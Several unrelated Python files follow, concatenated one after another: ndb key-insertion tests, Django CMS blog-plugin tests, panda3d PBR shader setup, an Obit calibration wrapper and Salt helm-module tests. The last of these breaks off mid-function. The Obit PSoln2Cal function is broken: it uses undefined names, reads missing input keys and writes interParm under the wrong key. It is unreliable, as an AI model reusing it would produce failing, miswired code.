class EntityX(ndb.Model):
a = ndb.IntegerProperty()
def _pre_put_hook(self):
super(EntityX, self)._pre_put_hook()
class EntityY(ndb.Model):
def _pre_put_hook(self):
super(EntityY, self)._pre_put_hook()
class MonotonicTest(test_case.TestCase):
def setUp(self):
super(MonotonicTest, self).setUp()
self.parent = ndb.Key('Root', 1)
def test_insert(self):
data = EntityX(id=1, parent=self.parent)
called = []
self.mock(EntityX, '_pre_put_hook', lambda _: called.append(1))
actual = monotonic.insert(data, None)
expected = ndb.Key('EntityX', 1, parent=self.parent)
self.assertEqual(expected, actual)
self.assertEqual([1], called)
def test_insert_already_present(self):
EntityX(id=1, parent=self.parent).put()
data = EntityX(id=1, parent=self.parent)
actual = monotonic.insert(data, None)
self.assertEqual(None, actual)
def test_insert_new_key(self):
data = EntityX(id=1, parent=self.parent)
extra = EntityY(id=1, parent=data.key)
# Make sure the _pre_put_hook functions are called.
called = []
self.mock(EntityX, '_pre_put_hook', lambda _: called.append(1))
self.mock(EntityY, '_pre_put_hook', lambda _: called.append(2))
actual = monotonic.insert(data, self.fail, extra=[extra])
expected = ndb.Key('EntityX', 1, parent=self.parent)
self.assertEqual(expected, actual)
self.assertEqual([1, 2], called)
def test_insert_new_key_already_present(self):
EntityX(id=1, parent=self.parent).put()
data = EntityX(id=1, parent=self.parent)
called = []
self.mock(EntityX, '_pre_put_hook', lambda _: called.append(1))
new_key = ndb.Key('EntityX', 2, parent=self.parent)
actual = monotonic.insert(data, lambda: called.append(2) or new_key)
expected = ndb.Key('EntityX', 2, parent=self.parent)
self.assertEqual(expected, actual)
self.assertEqual([2, 1], called)
def test_insert_new_key_already_present_twice(self):
EntityX(id=1, parent=self.parent).put()
EntityX(id=2, parent=self.parent).put()
data = EntityX(id=1, parent=self.parent)
new_keys = [
ndb.Key('EntityX', 2, parent=self.parent),
ndb.Key('EntityX', 3, parent=self.parent),
]
actual = monotonic.insert(data, lambda: new_keys.pop(0))
self.assertEqual([], new_keys)
expected = ndb.Key('EntityX', 3, parent=self.parent)
self.assertEqual(expected, actual)
def test_insert_new_key_already_present_twice_fail_after(self):
EntityX(id=1, parent=self.parent).put()
EntityX(id=2, parent=self.parent).put()
EntityX(id=3, parent=self.parent).put()
data = EntityX(id=1, parent=self.parent)
new_keys = [
ndb.Key('EntityX', 2, parent=self.parent),
ndb.Key('EntityX', 3, parent=self.parent),
]
actual = monotonic.insert(
data, lambda: new_keys.pop(0) if new_keys else None)
self.assertEqual([], new_keys)
self.assertEqual(None, actual)
def test_insert_transaction_failure(self):
EntityX(id=1, parent=self.parent).put()
calls = []
def transaction_async(*args, **kwargs):
calls.append(1)
if len(calls) < 2:
raise txn.CommitError()
return old_transaction_async(*args, **kwargs)
old_transaction_async = self.mock(
txn, 'transaction_async', transaction_async)
actual = monotonic.insert(EntityX(id=2, parent=self.parent))
expected = ndb.Key('EntityX', 2, parent=self.parent)
self.assertEqual(expected, actual)
self.assertEqual([1, 1], calls)
def test_get_versioned_root_model(self):
cls = monotonic.get_versioned_root_model('fidoula')
self.assertEqual('fidoula', cls._get_kind())
self.assertTrue(issubclass(cls, ndb.Model))
self.assertEqual(53, cls(current=53).current)
def test_get_versioned_most_recent(self):
# First entity id is HIGH_KEY_ID, second is HIGH_KEY_ID-1.
cls = monotonic.get_versioned_root_model('fidoula')
parent_key = ndb.Key(cls, 'foo')
for i in (monotonic.HIGH_KEY_ID, monotonic.HIGH_KEY_ID-1):
monotonic.store_new_version(EntityX(parent=parent_key), cls)
actual = monotonic.get_versioned_most_recent(EntityX, parent_key)
expected = EntityX(key=ndb.Key('EntityX', i, parent=parent_key))
self.assertEqual(expected, actual)
def test_get_versioned_most_recent_with_root(self):
# First entity id is HIGH_KEY_ID, second is HIGH_KEY_ID-1.
cls = monotonic.get_versioned_root_model('fidoula')
parent_key = ndb.Key(cls, 'foo')
for i in (monotonic.HIGH_KEY_ID, monotonic.HIGH_KEY_ID-1):
monotonic.store_new_version(EntityX(parent=parent_key), cls)
actual = monotonic.get_versioned_most_recent_with_root(
EntityX, parent_key)
expected = (
cls(key=parent_key, current=i),
EntityX(key=ndb.Key('EntityX', i, parent=parent_key)),
)
self.assertEqual(expected, actual)
def test_get_versioned_most_recent_with_root_already_saved(self):
# Stores the root entity with .current == None.
cls = monotonic.get_versioned_root_model('fidoula')
parent_key = ndb.Key(cls, 'foo')
cls(key=parent_key).put()
monotonic.store_new_version(EntityX(parent=parent_key), cls)
actual = monotonic.get_versioned_most_recent_with_root(EntityX, parent_key)
expected = (
cls(key=parent_key, current=monotonic.HIGH_KEY_ID),
EntityX(key=ndb.Key('EntityX', monotonic.HIGH_KEY_ID, parent=parent_key)),
)
self.assertEqual(expected, actual)
def test_get_versioned_most_recent_with_root_already_saved_invalid(self):
# Stores the root entity with an invalid .current value.
cls = monotonic.get_versioned_root_model('fidoula')
parent_key = ndb.Key(cls, 'foo')
cls(key=parent_key, current=23).put()
monotonic.store_new_version(EntityX(parent=parent_key), cls)
actual = monotonic.get_versioned_most_recent_with_root(EntityX, parent_key)
expected = (
cls(key=parent_key, current=23),
EntityX(key=ndb.Key('EntityX', 23, parent=parent_key)),
)
self.assertEqual(expected, actual)
def test_get_versioned_most_recent_with_root_unexpected_extra(self):
cls = monotonic.get_versioned_root_model('fidoula')
parent_key = ndb.Key(cls, 'foo')
monotonic.store_new_version(EntityX(parent=parent_key), cls)
monotonic.store_new_version(EntityX(parent=parent_key), cls)
EntityX(id=monotonic.HIGH_KEY_ID-2, parent=parent_key).put()
# The unexpected entity is not registered.
actual = monotonic.get_versioned_most_recent_with_root(EntityX, parent_key)
expected = (
cls(key=parent_key, current=monotonic.HIGH_KEY_ID-1),
EntityX(
key=ndb.Key('EntityX', monotonic.HIGH_KEY_ID-1, parent=parent_key)),
)
self.assertEqual(expected, actual)
# The unexpected entity is safely skipped. In particular, root.current was
# updated properly.
monotonic.store_new_version(EntityX(parent=parent_key), cls)
actual = monotonic.get_versioned_most_recent_with_root(EntityX, parent_key)
expected = (
cls(key=parent_key, current=monotonic.HIGH_KEY_ID-3),
EntityX(
key=ndb.Key('EntityX', monotonic.HIGH_KEY_ID-3, parent=parent_key)),
)
self.assertEqual(expected, actual)
def test_store_new_version(self):
cls = monotonic.get_versioned_root_model('fidoula')
parent = ndb.Key(cls, 'foo')
actual = monotonic.store_new_version(EntityX(a=1, parent=parent), cls)
self.assertEqual(
ndb.Key('fidoula', 'foo', 'EntityX', monotonic.HIGH_KEY_ID), actual)
actual = monotonic.store_new_version(EntityX(a=2, parent=parent), cls)
self.assertEqual(
ndb.Key('fidoula', 'foo', 'EntityX', monotonic.HIGH_KEY_ID - 1), actual)
def test_store_new_version_extra(self):
# Includes an unrelated entity in the PUT. It must be in the same entity
# group.
cls = monotonic.get_versioned_root_model('fidoula')
parent = ndb.Key(cls, 'foo')
class Unrelated(ndb.Model):
b = ndb.IntegerProperty()
unrelated = Unrelated(id='bar', parent=parent, b=42)
actual = monotonic.store_new_version(
EntityX(a=1, parent=parent), cls, extra=[unrelated])
self.assertEqual(
ndb.Key('fidoula', 'foo', 'EntityX', monotonic.HIGH_KEY_ID), actual)
actual = monotonic.store_new_version(EntityX(a=2, parent=parent), cls)
self.assertEqual(
ndb.Key('fidoula', 'foo', 'EntityX', monotonic.HIGH_KEY_ID - 1), actual)
self.assertEqual({'b': 42}, unrelated.key.get().to_dict())
def test_store_new_version_transaction_failure(self):
# Ensures that when a transaction fails, the key id is not modified and the
# retry is on the same key id.
cls = monotonic.get_versioned_root_model('fidoula')
parent = ndb.Key(cls, 'foo')
actual = monotonic.store_new_version(EntityX(a=1, parent=parent), cls)
calls = []
def transaction_async(*args, **kwargs):
calls.append(1)
if len(calls) < 2:
raise txn.CommitError()
return old_transaction_async(*args, **kwargs)
old_transaction_async = self.mock(
txn, 'transaction_async', transaction_async)
actual = monotonic.store_new_version(EntityX(a=2, parent=parent), cls)
self.assertEqual(
ndb.Key('fidoula', 'foo', 'EntityX', monotonic.HIGH_KEY_ID - 1), actual)
self.assertEqual([1, 1], calls)
if __name__ == '__main__':
if '-v' in sys.argv:
unittest.TestCase.maxDiff = None
unittest.main()
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""
Unit tests for the BlogPost plugin and its model
"""
import re
from datetime import datetime
from unittest import mock
from django import forms
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.test.client import RequestFactory
from django.utils import timezone
from cms.api import add_plugin, create_page
from cms.plugin_rendering import ContentRenderer
from cms.test_utils.testcases import CMSTestCase
from richie.apps.core.factories import UserFactory
from richie.apps.core.helpers import create_i18n_page
from richie.apps.courses.cms_plugins import BlogPostPlugin
from richie.apps.courses.factories import BlogPostFactory
from richie.apps.courses.models import BlogPostPluginModel
class BlogPostPluginTestCase(CMSTestCase):
"""
Test that BlogPostPlugin correctly displays a BlogPost's page placeholders content
"""
def test_cms_plugins_blogpost_form_page_choices(self):
"""
The form to create a blogpost plugin should only list blogpost pages
in the select box.
"""
class BlogPostPluginModelForm(forms.ModelForm):
"""A form for testing the choices in the select box"""
class Meta:
model = BlogPostPluginModel
fields = ["page"]
blog_page = create_i18n_page("my title", published=True)
blogpost = BlogPostFactory(page_parent=blog_page)
other_page_title = "other page"
create_page(
other_page_title, "richie/single_column.html", settings.LANGUAGE_CODE
)
plugin_form = BlogPostPluginModelForm()
rendered_form = plugin_form.as_table()
self.assertEqual(rendered_form.count(blogpost.extended_object.get_title()), 1)
self.assertNotIn(other_page_title, plugin_form.as_table())
def test_cms_plugins_blogpost_render_on_public_page(self):
"""
The blogpost plugin should render as expected on a public page.
"""
# Create a blogpost
blogpost = BlogPostFactory(
page_title={"en": "public title", "fr": "titre public"},
fill_cover={
"original_filename": "cover.jpg",
"default_alt_text": "my cover",
},
)
blogpost_page = blogpost.extended_object
# Create a page to add the plugin to
page = create_i18n_page({"en": "A page", "fr": "Une page"})
placeholder = page.placeholders.get(slot="maincontent")
add_plugin(placeholder, BlogPostPlugin, "en", **{"page": blogpost_page})
add_plugin(placeholder, BlogPostPlugin, "fr", **{"page": blogpost_page})
with mock.patch(
"cms.models.pagemodel.now",
return_value=datetime(2019, 11, 30, tzinfo=timezone.utc),
):
blogpost_page.publish("en")
blogpost_page.publish("fr")
page.publish("en")
page.publish("fr")
# Check the page content in English
url = page.get_absolute_url(language="en")
# The blogpost plugin should not be visible on the public page before it is published
blogpost_page.unpublish("en")
response = self.client.get(url)
self.assertNotContains(response, "public title")
# # Republish the plugin
blogpost_page.publish("en")
# Now modify the blogpost to have a draft different from the public version
title_obj = blogpost_page.get_title_obj(language="en")
title_obj.title = "draft title"
title_obj.save()
# Publishing the page again should make the plugin public
page.publish("en")
# Check the page content in English
response = self.client.get(url)
# The blogpost's name should be present as a link to the cms page
# And CMS page title should be in title attribute of the link
self.assertIn(
('<a href="/en/public-title/" ' 'class="blogpost-glimpse"'),
re.sub(" +", " ", str(response.content).replace("\\n", "")),
)
# The blogpost's title should be wrapped in a h2
blogpost.refresh_from_db()
blogpost_title = blogpost.public_extension.extended_object.get_title()
self.assertContains(
response,
f'<h2 class="blogpost-glimpse__title">{blogpost_title:s}</h2>',
html=True,
)
self.assertNotContains(response, "draft title")
# Blogpost's cover should be present
pattern = (
r'<div class="blogpost-glimpse__media">'
r'<img src="/media/filer_public_thumbnails/filer_public/.*cover\.jpg__300x170'
r'.*alt=""'
)
self.assertIsNotNone(re.search(pattern, str(response.content)))
# Publication date should be set by first publication
self.assertContains(
response,
'<p class="blogpost-glimpse__date">Nov. 30, 2019</p>',
html=True,
)
# Same checks in French
url = page.get_absolute_url(language="fr")
response = self.client.get(url)
self.assertIn(
('<a href="/fr/titre-public/" ' 'class="blogpost-glimpse"'),
re.sub(" +", " ", str(response.content).replace("\\n", "")),
)
# pylint: disable=no-member
pattern = (
r'<div class="blogpost-glimpse__media">'
r'<img src="/media/filer_public_thumbnails/filer_public/.*cover\.jpg__300x170'
r'.*alt=""'
)
self.assertIsNotNone(re.search(pattern, str(response.content)))
# Publication date should be set by first publication
self.assertContains(
response,
'<p class="blogpost-glimpse__date">30 novembre 2019</p>',
html=True,
)
def test_cms_plugins_blogpost_fallback_when_never_published(self):
"""
The blogpost plugin should render in the fallback language when the blogpost
page has never been published in the current language.
"""
# Create a blogpost
blogpost = BlogPostFactory(
page_title={"en": "public title", "fr": "titre public"},
fill_cover={
"original_filename": "cover.jpg",
"default_alt_text": "my cover",
},
)
blogpost_page = blogpost.extended_object
# Create a page to add the plugin to
page = create_i18n_page({"en": "A page", "fr": "Une page"})
placeholder = page.placeholders.get(slot="maincontent")
add_plugin(placeholder, BlogPostPlugin, "en", **{"page": blogpost_page})
add_plugin(placeholder, BlogPostPlugin, "fr", **{"page": blogpost_page})
# Publish only the French version of the blog post
with mock.patch(
"cms.models.pagemodel.now",
return_value=datetime(2019, 11, 30, tzinfo=timezone.utc),
):
blogpost_page.publish("fr")
# Check the page content in English
page.publish("en")
url = page.get_absolute_url(language="en")
response = self.client.get(url)
# The english blogpost's name should be present as a link to the cms page
# But the locale in the url should remain "en"
self.assertIn(
('<a href="/en/titre-public/" class="blogpost-glimpse"'),
re.sub(" +", " ", str(response.content).replace("\\n", "")),
)
# The blogpost's title should be wrapped in a h2
blogpost.refresh_from_db()
self.assertContains(
response,
'<h2 class="blogpost-glimpse__title">titre public</h2>',
html=True,
)
self.assertNotContains(response, "public title")
# Blogpost's cover should be present
pattern = (
r'<div class="blogpost-glimpse__media">'
r'<img src="/media/filer_public_thumbnails/filer_public/.*cover\.jpg__300x170'
r'.*alt=""'
)
self.assertIsNotNone(re.search(pattern, str(response.content)))
# Publication date should be set by first publication
self.assertContains(
response, '<p class="blogpost-glimpse__date">Nov. 30, 2019</p>', html=True
)
def test_cms_plugins_blogpost_fallback_when_published_unpublished(self):
"""
The blogpost plugin should not render when the blogpost was voluntarily
unpublished in the current language.
"""
# Create a blogpost
blogpost = BlogPostFactory(
page_title={"en": "public title", "fr": "titre public"},
fill_cover={
"original_filename": "cover.jpg",
"default_alt_text": "my cover",
},
)
blogpost_page = blogpost.extended_object
# Create a page to add the plugin to
page = create_i18n_page({"en": "A page", "fr": "Une page"})
placeholder = page.placeholders.get(slot="maincontent")
add_plugin(placeholder, BlogPostPlugin, "en", **{"page": blogpost_page})
add_plugin(placeholder, BlogPostPlugin, "fr", **{"page": blogpost_page})
# Publish only the French version of the blog post
with mock.patch(
"cms.models.pagemodel.now",
return_value=datetime(2019, 11, 30, tzinfo=timezone.utc),
):
blogpost_page.publish("fr")
blogpost_page.publish("en")
blogpost_page.unpublish("en")
# Check the page content in English
page.publish("en")
url = page.get_absolute_url(language="en")
response = self.client.get(url)
self.assertNotContains(response, "glimpse")
def test_cms_plugins_blogpost_render_on_draft_page(self):
"""
The blogpost plugin should render its public version on a draft page.
"""
staff = UserFactory(is_staff=True, is_superuser=True)
self.client.login(username=staff.username, password="password")
# Create a BlogPost
blogpost = BlogPostFactory(page_title="public title", should_publish=True)
blogpost_page = blogpost.extended_object
# Create a page to add the plugin to
page = create_i18n_page("A page")
placeholder = page.placeholders.get(slot="maincontent")
add_plugin(placeholder, BlogPostPlugin, "en", **{"page": blogpost_page})
page_url = page.get_absolute_url(language="en")
url = f"{page_url:s}?edit"
# The blogpost plugin should still be visible on the draft page
response = self.client.get(url)
self.assertContains(response, "public title")
# Now modify the blogpost to have a draft different from the public version
title_obj = blogpost_page.get_title_obj(language="en")
title_obj.title = "draft title"
title_obj.save()
# The public version of the blogpost plugin should still be visible
response = self.client.get(url)
self.assertNotContains(response, "draft title")
self.assertContains(response, "public title")
# Publication date block should be absent
self.assertContains(response, "__date")
def test_cms_plugins_blogpost_render_template(self):
"""
The blogpost plugin should render according to variant choice.
"""
staff = UserFactory(is_staff=True, is_superuser=True)
self.client.login(username=staff.username, password="password")
# Create an blogpost
blogpost = BlogPostFactory(page_title="public title", should_publish=True)
blogpost_page = blogpost.extended_object
# Create a page to add the plugin to
page = create_i18n_page("A page")
placeholder = page.placeholders.get(slot="maincontent")
# Add blogpost plugin with default template
add_plugin(placeholder, BlogPostPlugin, "en", page=blogpost_page)
page_url = page.get_absolute_url(language="en")
url = f"{page_url:s}?edit"
# The blogpost-glimpse default variant should be glimpse
response = self.client.get(url)
self.assertContains(response, "blogpost-glimpse")
# Add blogpost plugin with small variant
add_plugin(
placeholder, BlogPostPlugin, "en", page=blogpost_page, variant="small"
)
# The blogpost-glimpse default template should not have the small attribute
response = self.client.get(url)
self.assertContains(response, "blogpost-small")
def test_cms_plugins_blogpost_default_variant(self):
"""
If the variant is specified on the blogpost plugin and also as variant
variable in the context of its container, the instance variable should
be used.
"""
# Create an blogpost
blogpost = BlogPostFactory(page_title="public title", should_publish=True)
blogpost_page = blogpost.extended_object
# Create a page to add the plugin to
page = create_i18n_page("A page")
placeholder = page.placeholders.get(slot="maincontent")
# Add blogpost plugin with default template
model_instance = add_plugin(
placeholder, BlogPostPlugin, "en", page=blogpost_page, variant="small"
)
# Get generated html
request = RequestFactory()
request.current_page = page
request.path_info = "/en/my-path/"
request.user = AnonymousUser()
context = {"current_page": page, "blogpost_variant": "xxl", "request": request}
renderer = ContentRenderer(request=request)
html = renderer.render_plugin(model_instance, context)
self.assertIn("blogpost-small", html)
def test_cms_plugins_blogpost_cascade_variant(self):
"""
If the variant is not specified on the blogpost plugin, it should render
according to variant variable eventually present in the context of its
container.
"""
# Create an blogpost
blogpost = BlogPostFactory(page_title="public title", should_publish=True)
blogpost_page = blogpost.extended_object
# Create a page to add the plugin to
page = create_i18n_page("A page")
placeholder = page.placeholders.get(slot="maincontent")
# Add blogpost plugin with default template
model_instance = add_plugin(
placeholder, BlogPostPlugin, "en", page=blogpost_page
)
# Get generated html
request = RequestFactory()
request.current_page = page
request.path_info = "/en/my-path/"
request.user = AnonymousUser()
context = {"current_page": page, "blogpost_variant": "xxl", "request": request}
renderer = ContentRenderer(request=request)
html = renderer.render_plugin(model_instance, context)
self.assertIn("blogpost-xxl", html)
|
<reponame>TheCheapestPixels/panda3d-simplepbr
import os
import panda3d.core as p3d
from direct.filter.FilterManager import FilterManager
from .version import __version__
__all__ = [
'init',
]
def _add_shader_defines(shaderstr, defines):
shaderlines = shaderstr.split('\n')
for line in shaderlines:
if '#version' in line:
version_line = line
break
else:
raise RuntimeError('Failed to find GLSL version string')
shaderlines.remove(version_line)
define_lines = [
f'#define {define} {value}'
for define, value in defines.items()
]
return '\n'.join(
[version_line]
+ define_lines
+ ['#line 1']
+ shaderlines
)
def _load_shader_str(shaderpath, defines=None):
shader_dir = os.path.dirname(__file__)
with open(os.path.join(shader_dir, shaderpath)) as shaderfile:
shaderstr = shaderfile.read()
if defines is not None:
shaderstr = _add_shader_defines(shaderstr, defines)
return shaderstr
def init(*, render_node=None, window=None, camera_node=None, msaa_samples=4, max_lights=8):
'''Initialize the PBR render pipeline
:param render_node: The node to attach the shader too, defaults to `base.render` if `None`
:type render_node: `panda3d.core.NodePath`
:param window: The window to attach the framebuffer too, defaults to `base.win` if `None`
:type window: `panda3d.core.GraphicsOutput
:param camera_node: The NodePath of the camera to use when rendering the scene, defaults to `base.cam` if `None`
:type camera_node: `panda3d.core.NodePath
'''
if render_node is None:
render_node = base.render
if window is None:
window = base.win
if camera_node is None:
camera_node = base.cam
# Do not force power-of-two textures
p3d.Texture.set_textures_power_2(p3d.ATS_none)
# PBR shader
pbr_vert_str = _load_shader_str('simplepbr.vert')
pbr_frag_str = _load_shader_str('simplepbr.frag', {
'MAX_LIGHTS': max_lights,
})
pbrshader = p3d.Shader.make(
p3d.Shader.SL_GLSL,
vertex=pbr_vert_str,
fragment=pbr_frag_str,
)
render_node.set_shader(pbrshader)
# Tonemapping
manager = FilterManager(window, camera_node)
fbprops = p3d.FrameBufferProperties()
fbprops.float_color = True
fbprops.set_rgba_bits(16, 16, 16, 16)
fbprops.set_depth_bits(24)
fbprops.set_multisamples(msaa_samples)
scene_tex = p3d.Texture()
scene_tex.set_format(p3d.Texture.F_rgba16)
scene_tex.set_component_type(p3d.Texture.T_float)
tonemap_quad = manager.render_scene_into(colortex=scene_tex, fbprops=fbprops)
post_vert_str = _load_shader_str('post.vert')
post_frag_str = _load_shader_str('tonemap.frag')
tonemap_shader = p3d.Shader.make(
p3d.Shader.SL_GLSL,
vertex=post_vert_str,
fragment=post_frag_str,
)
tonemap_quad.set_shader(tonemap_shader)
tonemap_quad.set_shader_input('tex', scene_tex)
|
<gh_stars>1-10
# $Id$
#-----------------------------------------------------------------------
# Copyright (C) 2019
# Associated Universities, Inc. Washington DC, USA.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with this program; if not, write to the Free
# Software Foundation, Inc., 675 Massachusetts Ave, Cambridge,
# MA 02139, USA.
#
# Correspondence concerning this software should be addressed as follows:
# Internet email: <EMAIL>.
# Postal address: <NAME>
# National Radio Astronomy Observatory
# 520 Edgemont Road
# Charlottesville, VA 22903-2475 USA
#-----------------------------------------------------------------------
# Python interface to ObitSoln2Cal utilities
from __future__ import absolute_import
import Obit, UV, Table, OErr
# SN table smoothing
Soln2CalInput={
'structure':['PSoln2Cal',[('solnVer', 'Input Solution (SN) table version '),
('calIn', 'Input Cal (CL) table version, 0=high, -1=none'),
('calOut', 'Output Calibration table version, 0=>create new'),
('subA', 'Selected subarray (default 1)'),
('interMode','Interpolation mode 2PT, SELF POLY SIMP AMBG CUBE MWF '),
('interParm','interpolation parameters'),
('interNPoly','number of terms in polynomial'),
('maxInter', 'Max. time (day) over which to interpolate.'),
('allPass', 'If true copy unmodified entries as well.'),
('refAnt', 'Ref ant to use. (default 1)')]],
# defaults
'solnVer':0,
'calIn':0,
'calOut':0,
'subA':1,
'interMode':" ",
'interNPoly':2,
'maxInter':1.0,
'allPass':False,
'refAnt':1}
def PSoln2Cal (inUV, outUV, err, input=Soln2CalInput):
""" Apply a gain solution to a calibration table
inUV = UV data with solution and input calibration
outUV = UV data for output calibration table
err = Python Obit Error/message stack
input = input parameter dictionary
Input dictionary entries:
solnVer = Input Solution (SN) table version
calIn = Input Cal (CL) table version, 0=high, -1=none
calOut = Output Calibration table version, 0=>create new
subA = Selected subarray (default 1)
interMode = Interpolation mode 2PT, SELF POLY SIMP AMBG CUBE MWF '),
"2PT " = linear vector interpolation with no SN smoothing.
"SELF" = Use only SN solution from same source which is closest in time.
"POLY" = Fit a polynomial to the SN rates and delays.
Use the integral of the rate polynomial for the phases. (NYI)
"SIMP" = Simple linear phase connection between SN phase
entries, assumes phase difference less than 180 degrees.
"AMBG" = Linear phase connection using rates to resolve phase ambiguities.
"CUBE" = As AMBG but fit third order polynomial to phases and rates.
"MWF " = Median window filter of SN table before 2PT interpolation
"GAUS" = Gaussian smoothing of SN table before 2PT interpolation,
"BOX " = Boxcar smoothing of SN table before 2PT interpolation,
interParm = interpolation parameters, smoothing time (hr)
amplitude, phase, delay/rate
interNPoly = number of terms in polynomial'),
allPass = If true copy unmodified entries as well (default False)
refAnt = Ref ant to use. (default 1)
"""
################################################################
# Get input parameters
InData = input["InData"]
InTable = input["InTable"]
isuba = input["isuba"]
#
# Checks
if not UV.PIsA(inUV):
raise TypeError('PSoln2Cal: Bad input UV data')
if not UV.PIsA(outUV):
raise TypeError('PSoln2Cal: Bad output UV data')
# Set control values on UV
dim[0] = 1;
inInfo = UV.PGetList(InData) # Add control to UV data
dim[0] = 4
InfoList.PAlwaysPutString (inInfo, "interMode", dim, [input["interMode"]])
dim[0] = 1;
InfoList.PAlwaysPutInt (inInfo, "solnVer", dim, [input["solnVer"]])
InfoList.PAlwaysPutInt (inInfo, "calIn", dim, [input["calIn"]])
InfoList.PAlwaysPutInt (inInfo, "calOut", dim, [input["calOut"]])
InfoList.PAlwaysPutInt (inInfo, "subA", dim, [input["subA"]])
InfoList.PAlwaysPutInt (inInfo, "interNPoly", dim, [input["interNPoly"]])
InfoList.PAlwaysPutInt (inInfo, "refAnt", dim, [input["refAnt"]])
InfoList.PAlwaysPutBool (inInfo, "allPass",dim, [input["allPass"]])
dim[0] = len(input["interParm"])
InfoList.PAlwaysPutFloat (inInfo, "allPass",dim, input["interParm"])
# Calibrate
Obit.UVSoln2Cal (inUV, outUV, err)
if err.isErr:
printErrMsg(err, "Error applying SN table to CL table")
# end PSoln2Cal
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
# Import Salt Libs
import salt.modules.helm as helm
# Import Exception
from salt.exceptions import CommandExecutionError
# Import Salt Testing Libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.mock import MagicMock, call, patch
from tests.support.unit import TestCase
class HelmTestCase(TestCase, LoaderModuleMockMixin):
"""
Test cases for salt.modules.helm
"""
def setup_loader_modules(self):
return {helm: {}}
def test__prepare_cmd(self):
self.assertEqual(helm._prepare_cmd(), ("helm",))
def test__prepare_cmd_binary(self):
self.assertEqual(helm._prepare_cmd(binary="binary"), ("binary",))
def test__prepare_cmd_commands(self):
self.assertEqual(
helm._prepare_cmd(commands=["com1", "com2"]), ("helm", "com1", "com2",)
)
def test__prepare_cmd_flags(self):
self.assertEqual(
helm._prepare_cmd(flags=["flag1", "--flag2"]),
("helm", "--flag1", "--flag2",),
)
def test__prepare_cmd_kvflags(self):
result_tuple = helm._prepare_cmd(
kvflags={"kflag1": "vflag1", "--kflag2": "vflag2"}
)
tuple_valide_1 = (
"helm",
"--kflag1",
"vflag1",
"--kflag2",
"vflag2",
)
tuple_valide_2 = (
"helm",
"--kflag2",
"vflag2",
"--kflag1",
"vflag1",
)
#
self.assertEqual(
True, result_tuple == tuple_valide_1 or result_tuple == tuple_valide_2
)
def test__exec_cmd(self):
cmd_prepare = helm._prepare_cmd()
cmd_prepare_str = " ".join(cmd_prepare)
cmd_return = {
"stdout": "succes",
"stderr": "",
"retcode": 0,
}
result = cmd_return
result.update({"cmd": cmd_prepare_str})
with patch.dict(
helm.__salt__,
{ # pylint: disable=no-member
"cmd.run_all": MagicMock(return_value=cmd_return)
},
):
self.assertEqual(helm._exec_cmd(), result)
def test__exec_true_return_valid(self):
_exec_cmd_return = {"retcode": 0}
with patch(
"salt.modules.helm._exec_cmd", MagicMock(return_value=_exec_cmd_return)
):
self.assertEqual(True, helm._exec_true_return())
def test__exec_true_return_not_valid(self):
_exec_cmd_return = {"retcode": -1, "stderr": "test"}
with patch(
"salt.modules.helm._exec_cmd", MagicMock(return_value=_exec_cmd_return)
):
self.assertEqual("test", helm._exec_true_return())
def test__exec_string_return_valid(self):
_exec_cmd_return = {"retcode": 0, "stdout": "test"}
with patch(
"salt.modules.helm._exec_cmd", MagicMock(return_value=_exec_cmd_return)
):
self.assertEqual("test", helm._exec_string_return())
def test__exec_string_return_not_valid(self):
_exec_cmd_return = {"retcode": -1, "stderr": "test"}
with patch(
"salt.modules.helm._exec_cmd", MagicMock(return_value=_exec_cmd_return)
):
self.assertEqual("test", helm._exec_string_return())
def test__exec_dict_return_valide(self):
_exec_cmd_return = {"retcode": 0, "stdout": '{"test": true}'}
with patch(
"salt.modules.helm._exec_cmd", MagicMock(return_value=_exec_cmd_return)
):
self.assertEqual({"test": True}, helm._exec_dict_return())
def test__exec_dict_return_valide_no_json(self):
_exec_cmd_return = {"retcode": 0, "stdout": '{"test": true}'}
with patch(
"salt.modules.helm._exec_cmd", MagicMock(return_value=_exec_cmd_return)
):
self.assertEqual(
'{"test": true}', helm._exec_dict_return(kvflags={"output": "table"})
)
def test__exec_dict_return_not_valid(self):
_exec_cmd_return = {"retcode": -1, "stderr": "test"}
with patch(
"salt.modules.helm._exec_cmd", MagicMock(return_value=_exec_cmd_return)
):
self.assertEqual("test", helm._exec_dict_return())
def test_completion(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.completion("bash"))
self.assertEqual(
[call(commands=["completion", "bash"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_create(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.create("name"))
self.assertEqual(
[call(commands=["create", "name"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_dependency_build(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.dependency_build("chart"))
self.assertEqual(
[
call(
commands=["dependency", "build", "chart"],
flags=None,
kvflags=None,
)
],
magic_mock.mock_calls,
)
def test_dependency_list(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.dependency_list("chart"))
self.assertEqual(
[
call(
commands=["dependency", "list", "chart"],
flags=None,
kvflags=None,
)
],
magic_mock.mock_calls,
)
def test_dependency_update(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.dependency_update("chart"))
self.assertEqual(
[
call(
commands=["dependency", "update", "chart"],
flags=None,
kvflags=None,
)
],
magic_mock.mock_calls,
)
def test_env(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.env())
self.assertEqual(
[call(commands=["env"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_get_all(self):
magic_mock = MagicMock(return_value="the_return")
